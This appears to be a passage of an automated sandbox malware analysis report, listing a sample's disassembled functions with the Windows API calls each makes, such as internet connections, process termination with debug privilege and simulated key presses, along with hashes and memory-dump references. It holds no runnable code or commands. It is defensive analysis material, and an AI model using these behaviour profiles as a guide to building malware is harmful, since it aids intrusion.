                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BE3AAF,?,?,Bad directive syntax error,00C3CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C098BC
                                                                      • LoadStringW.USER32(00000000,?,00BE3AAF,?), ref: 00C098C3
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • MessageBoxW.USER32 ref: 00C09987
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 858772685-4153970271
                                                                      • Opcode ID: e23770f2c4a3f14ae9485b0bd1c7a0db96be3c838e862ad99609c9f28c18164a
                                                                      • Instruction ID: 3031df925eec97c3373fc1ed15a3900313ca1329fe2fe2723cdc50b16c8df036
                                                                      • Opcode Fuzzy Hash: e23770f2c4a3f14ae9485b0bd1c7a0db96be3c838e862ad99609c9f28c18164a
                                                                      • Instruction Fuzzy Hash: 4C218D3280421AABCF21EF90CC46FFE77B5FF19700F0444A9F519620A2EB719A18DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32 ref: 00C020AB
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00C020C0
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C0214D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 1290815626-3381328864
                                                                      • Opcode ID: 227279cb58b36dfabb14001c06c358b9f6576c76bbd28bc007b2821b71e470c7
                                                                      • Instruction ID: 86aa876274cba66310217bf5ca4596f8970e40f212179290039f60adc982f531
                                                                      • Opcode Fuzzy Hash: 227279cb58b36dfabb14001c06c358b9f6576c76bbd28bc007b2821b71e470c7
                                                                      • Instruction Fuzzy Hash: 2B113676288306BAFA252220DC0BEAE73ECCB04324F20006AFB04A40D1EB616D029614
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C350D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00C35186
                                                                      • ShowWindow.USER32(?,00000000), ref: 00C351C7
                                                                      • ShowWindow.USER32(?,00000005), ref: 00C351CD
                                                                      • SetFocus.USER32 ref: 00C351D1
                                                                        • Part of subcall function 00C36FBA: DeleteObject.GDI32(00000000), ref: 00C36FE6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C3520D
                                                                      • SetWindowLongW.USER32 ref: 00C3521A
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00C3524D
                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00C35287
                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00C35296
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                      • String ID:
                                                                      • API String ID: 3210457359-0
                                                                      • Opcode ID: 70c767354c786eb493d6b5e8408d1ebef5a7283c1981828c5c3fdb32de1a9d74
                                                                      • Instruction ID: 0a701ac7875dbd9aa212af1eae6d7abc91ada1c5eb15c2b32a1ca358d5cb0327
                                                                      • Opcode Fuzzy Hash: 70c767354c786eb493d6b5e8408d1ebef5a7283c1981828c5c3fdb32de1a9d74
                                                                      • Instruction Fuzzy Hash: 2C519230A60A08BFEF209F25CC4ABDD3BA5FB05361F144511FA25962E1C776AA90DB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadImageW.USER32 ref: 00BF6890
                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00BF68A9
                                                                      • LoadImageW.USER32 ref: 00BF68B9
                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00BF68D1
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BF68F2
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00BF6901
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BF691E
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00BF692D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                      • String ID:
                                                                      • API String ID: 1268354404-0
                                                                      • Opcode ID: 69cae79b3289c9fb076b3cbcdd8eb27668ec76e2d1874a1765f6e5168c77be0a
                                                                      • Instruction ID: 6d3394f21100f192ecedfa5e8cbc6f5dc5eea187f5ff9a7fab5d25e5f88b46b9
                                                                      • Opcode Fuzzy Hash: 69cae79b3289c9fb076b3cbcdd8eb27668ec76e2d1874a1765f6e5168c77be0a
                                                                      • Instruction Fuzzy Hash: 05517B70610209EFDB20CF24CC95BBE7BF9EB48760F144558FA16A72A0DBB1E990DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C1C182
                                                                      • GetLastError.KERNEL32 ref: 00C1C195
                                                                      • SetEvent.KERNEL32(?), ref: 00C1C1A9
                                                                        • Part of subcall function 00C1C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C1C272
                                                                        • Part of subcall function 00C1C253: GetLastError.KERNEL32 ref: 00C1C322
                                                                        • Part of subcall function 00C1C253: SetEvent.KERNEL32(?), ref: 00C1C336
                                                                        • Part of subcall function 00C1C253: InternetCloseHandle.WININET(00000000), ref: 00C1C341
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 337547030-0
                                                                      • Opcode ID: 8b8a0cb086132a2fe04efceae8a259efb65511a9cbb3bf70d37dc46a513857e9
                                                                      • Instruction ID: ebb8405c13f216b9efa6889b3dea77051d9b7e10140b0d73302e672544ff93a4
                                                                      • Opcode Fuzzy Hash: 8b8a0cb086132a2fe04efceae8a259efb65511a9cbb3bf70d37dc46a513857e9
                                                                      • Instruction Fuzzy Hash: 1D318F71280601BFDB219FA5DC84BAFBBF9FF1A300B10841DF96692610D731E954EB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C025A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                                        • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A5E
                                                                        • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00C03A65
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C025BD
                                                                      • PostMessageW.USER32 ref: 00C025DB
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C025DF
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C025E9
                                                                      • PostMessageW.USER32 ref: 00C02601
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C02605
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C0260F
                                                                      • PostMessageW.USER32 ref: 00C02623
                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C02627
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0
                                                                      • Opcode ID: 90e9d906a7c8c3db885e6f31241fda3b494a677b4cc2bb2129d8c28fa34fc7fb
                                                                      • Instruction ID: ece1dbab26eeaaaec49efb2728a2e7ef71d93d73df16c9ffcd4624f50f2ef86a
                                                                      • Opcode Fuzzy Hash: 90e9d906a7c8c3db885e6f31241fda3b494a677b4cc2bb2129d8c28fa34fc7fb
                                                                      • Instruction Fuzzy Hash: 6201D4313A4610BBFB2067699CCEF5D3F59DB4EB12F100001F318BE0D1C9E22444EA69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C01803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C01449,?,?,00000000), ref: 00C0180C
                                                                      • HeapAlloc.KERNEL32(00000000,?,00C01449,?,?,00000000), ref: 00C01813
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01449,?,?,00000000), ref: 00C01828
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00C01449,?,?,00000000), ref: 00C01830
                                                                      • DuplicateHandle.KERNEL32 ref: 00C01833
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01449,?,?,00000000), ref: 00C01843
                                                                      • GetCurrentProcess.KERNEL32(00C01449,00000000,?,00C01449,?,?,00000000), ref: 00C0184B
                                                                      • DuplicateHandle.KERNEL32 ref: 00C0184E
                                                                      • CreateThread.KERNEL32(00000000,00000000,00C01874,00000000,00000000,00000000), ref: 00C01868
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 42d12fce873f850ba7c6289e8bab0207fd5d40662f9f3f3e4efa18769ce79d07
                                                                      • Instruction ID: 72f6bdec9f375b66c51fbb3272d5422e9d29d486a310ac1aab4dd2b27ba9100c
                                                                      • Opcode Fuzzy Hash: 42d12fce873f850ba7c6289e8bab0207fd5d40662f9f3f3e4efa18769ce79d07
                                                                      • Instruction Fuzzy Hash: AF01BBB5250308BFE710ABA5DC8DF6F7BACEB89B11F018411FA05EB1A1CA70D810DB20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0C5D0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                                      • GetMenuItemInfoW.USER32 ref: 00C0C6EE
                                                                      • _wcslen.LIBCMT ref: 00C0C735
                                                                      • SetMenuItemInfoW.USER32 ref: 00C0C79C
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C0C7CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                      • String ID: 0$x`$x`
                                                                      • API String ID: 1227352736-927836491
                                                                      • Opcode ID: a4a18e85dce32e18e755ce725a8e43cf3c5c968eb80c910c6800f336f98d4df4
                                                                      • Instruction ID: f097164b10e2465d60b7b031202dab1e7e5aacf1d0baaa44f830d6ddfe227ee4
                                                                      • Opcode Fuzzy Hash: a4a18e85dce32e18e755ce725a8e43cf3c5c968eb80c910c6800f336f98d4df4
                                                                      • Instruction Fuzzy Hash: 46519D716183019BD7259F2CC8C5B6E77E8AB89310F040B29F9A5E21E0DBB4DA44DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C0D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C0D501
                                                                        • Part of subcall function 00C0D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C0D50F
                                                                        • Part of subcall function 00C0D4DC: CloseHandle.KERNEL32(00000000), ref: 00C0D5DC
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2A16D
                                                                      • GetLastError.KERNEL32 ref: 00C2A180
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2A1B3
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C2A268
                                                                      • GetLastError.KERNEL32(00000000), ref: 00C2A273
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C2A2C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: 49f22f6100dd80775b82edfdebbb32acaa17270c5f3948aef7e170e73dd5fe79
                                                                      • Instruction ID: 1b0dc1764e1c8acc037251bb68776f494cd4069bf3c6a20dd192d499e9f2acce
                                                                      • Opcode Fuzzy Hash: 49f22f6100dd80775b82edfdebbb32acaa17270c5f3948aef7e170e73dd5fe79
                                                                      • Instruction Fuzzy Hash: BB618070208252EFD710DF19D494F19BBE1AF45318F19849CE46A8BBA3C772ED49CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C33886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C33925
                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C3393A
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C33954
                                                                      • _wcslen.LIBCMT ref: 00C33999
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C339C6
                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C339F4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcslen
                                                                      • String ID: SysListView32
                                                                      • API String ID: 2147712094-78025650
                                                                      • Opcode ID: 5f2acf0338083346679d402527c935b5f0e3a243a7e6b586c8c4dfff32307ba1
                                                                      • Instruction ID: 5f8de08b4c8f9d5369882384cd686e0e0613b2f81c97c99417f86c1425ea3b94
                                                                      • Opcode Fuzzy Hash: 5f2acf0338083346679d402527c935b5f0e3a243a7e6b586c8c4dfff32307ba1
                                                                      • Instruction Fuzzy Hash: B341A271A10358ABEB219F64CC49FEE77A9EF08350F140566F958E7281D7719A80CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: f11daf9fe25d67657320b8f4825a356efb748a9e8e80335aae9715d58a05e6e1
                                                                      • Instruction ID: 872879ab4180d8a3c65eeebec9937cfa2c0aacb40b2a0dff6a58136f16b22063
                                                                      • Opcode Fuzzy Hash: f11daf9fe25d67657320b8f4825a356efb748a9e8e80335aae9715d58a05e6e1
                                                                      • Instruction Fuzzy Hash: B2113A32689306BAE7149B149CC3EAE37DCDF15715F20423EF904A62C2E7B09F009268
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 952045576-0
                                                                      • Opcode ID: 57748cc3be02c37fa48cdd0eef28d6457c7c1fec482ac9dea566125d13a64f03
                                                                      • Instruction ID: e74766a4bbe17c79024f64d9dfc7a1eb7de6d35cf1cf71a6b7ffac112478f028
                                                                      • Opcode Fuzzy Hash: 57748cc3be02c37fa48cdd0eef28d6457c7c1fec482ac9dea566125d13a64f03
                                                                      • Instruction Fuzzy Hash: 45419265C1021875CB11EBF4C88AEDFB7E8AF45710F5088AAE528E3161FB34E755C3A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BBF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00BBF953
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006), ref: 00BFF3D1
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00BFF454
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: 19c3a5131cab2e99045c422cff9c29a376279b03b510501c5e52b09a99f2edbe
